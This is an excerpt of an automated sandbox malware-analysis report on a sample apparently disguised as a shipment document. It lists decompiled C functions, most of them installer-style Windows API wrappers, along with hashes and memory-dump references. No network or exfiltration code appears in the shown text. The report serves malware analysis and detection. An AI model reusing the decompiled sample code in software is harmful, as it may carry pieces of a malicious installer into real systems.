                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                • Instruction ID: 36c6d552b97af02dd58307b05a598db1695570393df740455f8c701413f3969e
                                                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                • Instruction Fuzzy Hash: AFE0E632150169ABDF10DE559C00EEB775CEB05351F014476F955E3150DA31E87197A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6EAC2A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x6eac5048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x6eac505c, 4, 0x40, 0x6eac504c); // executed
					 *0x6eac505c = 0xc2;
					 *0x6eac504c = 0;
					 *0x6eac5054 = 0;
					 *0x6eac5068 = 0;
					 *0x6eac5058 = 0;
					 *0x6eac5050 = 0;
					 *0x6eac5060 = 0;
					 *0x6eac505e = 0;
				}
				return 1;
			}



                                                0x6eac2a88
                                                0x6eac2a8d
                                                0x6eac2a9d
                                                0x6eac2aa5
                                                0x6eac2aac
                                                0x6eac2ab1
                                                0x6eac2ab6
                                                0x6eac2abb
                                                0x6eac2ac0
                                                0x6eac2ac5
                                                0x6eac2aca
                                                0x6eac2aca
                                                0x6eac2ad2

                                                APIs
                                                • VirtualProtect.KERNELBASE(6EAC505C,00000004,00000040,6EAC504C), ref: 6EAC2A9D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.520623463.000000006EAC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EAC0000, based on PE: true
                                                • Associated: 00000000.00000002.520610261.000000006EAC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.520638610.000000006EAC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.520646374.000000006EAC6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6eac0000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: d4fc1c874d8f87014dbee7a6d70ed3810466a54d68a4325fcc7100dba7da6d8c
                                                • Instruction ID: 29bcc53328072cae4a36948b6a32c80036c8e35e7fbe0c8de7a045ee214d7bf9
                                                • Opcode Fuzzy Hash: d4fc1c874d8f87014dbee7a6d70ed3810466a54d68a4325fcc7100dba7da6d8c
                                                • Instruction Fuzzy Hash: F0F0A5B1544B80DECF50CF6884487093BF0BB5AF04B97C52AF148EE240E7344486DB9A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406374 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00406374(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E004062F3(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                0x0040637e
                                                0x00406385
                                                0x00406398
                                                0x00000000
                                                0x00406398
                                                0x00406389
                                                0x00000000

                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406402,?,00000000,?,?,Call,?), ref: 00406398
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                • Instruction ID: 95f024e915835d806257714b27b18acfdec26fcf9bd71fa5ecdde53cd8054228
                                                • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                • Instruction Fuzzy Hash: 00D0123210030DBBDF11AF90DD01FAB3B1DAB08310F014436FE06A5091D776D530AB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004044AF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004044AF(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x4291f8;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                0x004044af
                                                0x004044b6
                                                0x004044c1
                                                0x00000000
                                                0x004044c1
                                                0x004044c7

                                                APIs
                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
                                                • Instruction ID: 22c14ff0de7d99e8655fd7423acc63eaa31bea8074cc9abcc6b2c74ee929f0f7
                                                • Opcode Fuzzy Hash: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
                                                • Instruction Fuzzy Hash: 54C09B71740706BBEE608F519D49F1777586750700F298579B755F60D0C674E410DA1C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404498 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00404498(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x42a228, 0x28, _a4, 1); // executed
				return _t2;
			}




                                                0x004044a6
                                                0x004044ac

                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
                                                • Instruction ID: a70792fcf8e9dbddb4bc54a752e2f47ec30058e0f009e109d264f56951a5bac9
                                                • Opcode Fuzzy Hash: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
                                                • Instruction Fuzzy Hash: 28B09236281A00EBDE614B00EE09F457A62A768701F008468B641240B0CAB240A5DB19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004034AF Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004034AF(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                0x004034bd
                                                0x004034c3

                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,00403847,?), ref: 004034BD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404485 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00404485(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x423704, _a4); // executed
				return _t2;
			}




                                                0x0040448f
                                                0x00404495

                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,0040425C), ref: 0040448F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
                                                • Instruction ID: c8b2e0b7737fb6f3a2012ed53d18a955e8c044ab00f5fdb14f1eccf879f4c073
                                                • Opcode Fuzzy Hash: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
                                                • Instruction Fuzzy Hash: 6FA001B6604500ABDE129FA1EF09D0ABF72EBA4702B418579E28590034CB364961EF1D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402D84(_t7);
				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}







                                                0x004014d7
                                                0x004014d8
                                                0x004014e1
                                                0x004014e4
                                                0x004014e8
                                                0x004014e8
                                                0x004014ea
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 531fc49b39326f047bd867b4956693a17a39f06a36c2e0e9728951694256af91
                                                • Instruction ID: 13549e56dd5f321cd39d4a1c5d69ee1d893e1909e6cc3dd33a15c81121e8da7c
                                                • Opcode Fuzzy Hash: 531fc49b39326f047bd867b4956693a17a39f06a36c2e0e9728951694256af91
                                                • Instruction Fuzzy Hash: 7CD05E73A141018BD714EBB8BE8545E73A8EB503193208837D402E1191E67888564618
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6EAC12BB Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E6EAC12BB() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x6eac506c +  *0x6eac506c); // executed
				return _t3;
			}




                                                0x6eac12c5
                                                0x6eac12cb

                                                APIs
                                                • GlobalAlloc.KERNELBASE(00000040,?,6EAC12DB,?,6EAC137F,00000019,6EAC11CA,-000000A0), ref: 6EAC12C5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.520623463.000000006EAC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EAC0000, based on PE: true
                                                • Associated: 00000000.00000002.520610261.000000006EAC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.520638610.000000006EAC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.520646374.000000006EAC6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6eac0000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: AllocGlobal
                                                • String ID:
                                                • API String ID: 3761449716-0
                                                • Opcode ID: 6f6c4d861a08f21bc0d41f59b75f672e3d434cce8bf9cb8f8028821070aaa598
                                                • Instruction ID: 14ae9f7f976c025942e05fda3b9ea6aa41ddd54574bcee6a4910e16687233fc5
                                                • Opcode Fuzzy Hash: 6f6c4d861a08f21bc0d41f59b75f672e3d434cce8bf9cb8f8028821070aaa598
                                                • Instruction Fuzzy Hash: A6B01270A40600DFEE008B64CC0EF343254EB01B01F05C010FA00E8180C5244C028538
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 00404954 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 78%
                                                			E00404954(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x4226e0; // 0x54d124
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B4B(0x3fb, _t146);
					E0040678E(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B4B(0x3fb, _t146);
							if(E00405EDE(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406507(0x4216d8, _t146);
							_t87 = E004068D4(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406507(0x4216d8, _t146);
								_t89 = E00405E81(0x4216d8);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x4216d8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x4216d8) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x4216d8,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E22(0x4216d8);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x4216d8) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404DF1(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x4291fc + 0x10)) != _t158) {
									E00404DD9(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x4216c8);
									} else {
										E00404D10(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a2c4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404485(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x4236f8 == _t158) {
									E004048AD();
								}
								 *0x4236f8 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423708;
							_v60 = E00404CAA;
							_v56 = _t146;
							_v68 = E00406544(_t146, 0x423708, _t167, 0x421ee0, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405DD6(_t146);
								_t125 =  *((intOrPtr*)( *0x42a230 + 0x11c));
								if( *((intOrPtr*)( *0x42a230 + 0x11c)) != 0 && _t146 == L"C:\\Users\\hardz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\timelrer\\Tdlen") {
									E00406544(_t146, 0x423708, _t167, 0, _t125);
									if(lstrcmpiW(0x4281c0, 0x423708) != 0) {
										lstrcatW(_t146, 0x4281c0);
									}
								}
								 *0x4236f8 =  *0x4236f8 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E4D(_t146) != 0 && E00405E81(_t146) == 0) {
						E00405DD6(_t146);
					}
					 *0x4291f8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404463(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404463(_t167);
					E00404498(_t166);
					_t138 = E004068D4(8);
					if(_t138 == 0) {
						L53:
						return E004044CA(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                0x00404954
                                                0x0040495a
                                                0x00404960
                                                0x0040496d
                                                0x0040497b
                                                0x0040497e
                                                0x00404986
                                                0x0040498c
                                                0x0040498c
                                                0x00404998
                                                0x0040499b
                                                0x00404a09
                                                0x00404a10
                                                0x00404ae7
                                                0x00404aee
                                                0x00404afd
                                                0x00404afd
                                                0x00404b01
                                                0x00404b0b
                                                0x00404b18
                                                0x00404b1a
                                                0x00404b1a
                                                0x00404b28
                                                0x00404b2f
                                                0x00404b36
                                                0x00404b39
                                                0x00404b75
                                                0x00404b77
                                                0x00404b7d
                                                0x00404b82
                                                0x00404b86
                                                0x00404b88
                                                0x00404b88
                                                0x00404ba4
                                                0x00000000
                                                0x00404ba6
                                                0x00404ba9
                                                0x00404bb7
                                                0x00404bbd
                                                0x00404bbe
                                                0x00404bc1
                                                0x00404bc4
                                                0x00000000
                                                0x00404bc4
                                                0x00404b3b
                                                0x00404b3d
                                                0x00404b41
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404b43
                                                0x00404b43
                                                0x00404b50
                                                0x00404b55
                                                0x00000000
                                                0x00000000
                                                0x00404b59
                                                0x00404b5b
                                                0x00404b5b
                                                0x00404b64
                                                0x00404b66
                                                0x00404b6b
                                                0x00404b6e
                                                0x00404b73
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404b73
                                                0x00404bd0
                                                0x00404bda
                                                0x00404bdd
                                                0x00404be0
                                                0x00404be7
                                                0x00404be7
                                                0x00404be9
                                                0x00404be9
                                                0x00404bee
                                                0x00404bf0
                                                0x00404bf8
                                                0x00404bff
                                                0x00404c01
                                                0x00404c0c
                                                0x00404c0c
                                                0x00404c01
                                                0x00404c1c
                                                0x00404c26
                                                0x00404c2e
                                                0x00404c49
                                                0x00404c30
                                                0x00404c39
                                                0x00404c39
                                                0x00404c2e
                                                0x00404c4e
                                                0x00404c53
                                                0x00404c58
                                                0x00404c61
                                                0x00404c61
                                                0x00404c6a
                                                0x00404c6c
                                                0x00404c6c
                                                0x00404c78
                                                0x00404c80
                                                0x00404c8a
                                                0x00404c8a
                                                0x00404c8f
                                                0x00000000
                                                0x00404c8f
                                                0x00404b39
                                                0x00404af0
                                                0x00404af7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404af7
                                                0x00404a16
                                                0x00404a1f
                                                0x00404a39
                                                0x00404a3e
                                                0x00404a48
                                                0x00404a4f
                                                0x00404a5b
                                                0x00404a5e
                                                0x00404a61
                                                0x00404a68
                                                0x00404a70
                                                0x00404a73
                                                0x00404a77
                                                0x00404a7e
                                                0x00404a86
                                                0x00404ae0
                                                0x00404a88
                                                0x00404a89
                                                0x00404a90
                                                0x00404a9a
                                                0x00404aa2
                                                0x00404aaf
                                                0x00404ac3
                                                0x00404ac7
                                                0x00404ac7
                                                0x00404ac3
                                                0x00404acc
                                                0x00404ad9
                                                0x00404ad9
                                                0x00404a86
                                                0x00000000
                                                0x00404a3e
                                                0x00404a2c
                                                0x00000000
                                                0x00000000
                                                0x00404a32
                                                0x00000000
                                                0x0040499d
                                                0x004049aa
                                                0x004049b3
                                                0x004049c0
                                                0x004049c0
                                                0x004049c7
                                                0x004049cd
                                                0x004049d6
                                                0x004049d9
                                                0x004049dc
                                                0x004049e4
                                                0x004049e7
                                                0x004049ea
                                                0x004049f0
                                                0x004049f7
                                                0x004049fe
                                                0x00404c95
                                                0x00404ca7
                                                0x00404a04
                                                0x00404a07
                                                0x00000000
                                                0x00404a07
                                                0x004049fe

                                                APIs
                                                • GetDlgItem.USER32 ref: 004049A3
                                                • SetWindowTextW.USER32(00000000,?), ref: 004049CD
                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404A7E
                                                • CoTaskMemFree.OLE32(00000000), ref: 00404A89
                                                • lstrcmpiW.KERNEL32(Call,00423708,00000000,?,?), ref: 00404ABB
                                                • lstrcatW.KERNEL32(?,Call), ref: 00404AC7
                                                • SetDlgItemTextW.USER32 ref: 00404AD9
                                                  • Part of subcall function 00405B4B: GetDlgItemTextW.USER32 ref: 00405B5E
                                                  • Part of subcall function 0040678E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
